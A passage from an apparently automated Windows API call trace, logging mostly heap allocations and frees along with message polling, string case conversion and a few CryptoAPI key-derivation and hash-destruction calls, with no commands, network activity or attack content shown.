RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.195] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.195] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.195] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.195] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.195] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.196] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.196] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0262.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.202] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.203] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.203] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.203] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.203] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.206] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.206] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.207] HeapFree (in: hHeap=0x25c0000, 